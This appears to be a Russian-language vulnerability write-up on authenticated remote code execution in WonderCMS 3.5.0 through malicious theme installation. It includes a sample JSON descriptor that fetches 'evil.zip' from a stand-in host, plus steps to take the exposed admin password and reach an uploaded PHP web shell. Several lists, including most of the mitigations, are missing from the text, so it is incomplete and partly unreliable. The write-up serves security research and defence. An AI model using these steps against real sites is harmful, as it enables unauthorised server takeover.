
Эксплойт аутентифицированного RCE для WonderCMS 3.5.0 через вредоносную установку темы. Включает механику уязвимости, PoC и рекомендации по смягчению последствий для тестирования безопасности и обучения.
Аутентифицированная уязвимость удаленного выполнения кода (RCE) существует в WonderCMS v3.5.0.
Проблема связана с тем, как приложение обрабатывает удаленные установки тем/модулей через JSON-дескрипторы. Когда администратор отправляет удаленный JSON-файл, ссылающийся на ZIP-архив, его содержимое извлекается в веб-доступную директорию (например, /themes/). Если ZIP-архив содержит PHP-файл, этот файл становится доступным через веб и может быть выполнен.
Такое поведение создает риск RCE из-за:
Примечание: Требуется аутентификация администратора, но установки по умолчанию публично раскрывают пароль администратора (на главной странице), используют только пароль для входа и не применяют строгие средства контроля аутентификации.
WonderCMS примет и попытается установить удаленные модули/темы, если отправленный JSON-дескриптор соответствует ожидаемому формату wcms-modules.json. Дескриптор, прошедший проверку формата (и указывающий на ZIP-архив), будет получен, а его содержимое архива будет извлечено в веб-доступную директорию (например, ) без дальнейшей проверки типов файлов.
/themes/<name>/Пример дескриптора:
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Предупреждение: Не запускайте на производственных системах. Используйте только авторизованные тестовые среды.
Получите пароль администратора с публично доступной главной страницы установки WonderCMS по умолчанию.
Войдите в панель администратора.
Перейдите в раздел установки тем.
Укажите URL вредоносного JSON-дескриптора (например, размещенного на сервере, контролируемом атакующим).
Запустите установку. Сервер:
Установит загруженную вредоносную тему.
Получите доступ к извлеченной PHP-оболочке (например, http://target.com/themes/<Theme_Name>/shell.php) для выполнения произвольных команд.
(Примечание: Выполняйте эти шаги только в контролируемой тестовой среде. Эксплуатация этой уязвимости на живых системах без разрешения незаконна.)
Для снижения риска:
themes/ или plugins/ с помощью конфигурации сервера.Эта информация предоставлена для исследований в области защитной безопасности и в образовательных целях. Всегда получайте надлежащее разрешение перед тестированием или раскрытием уязвимостей.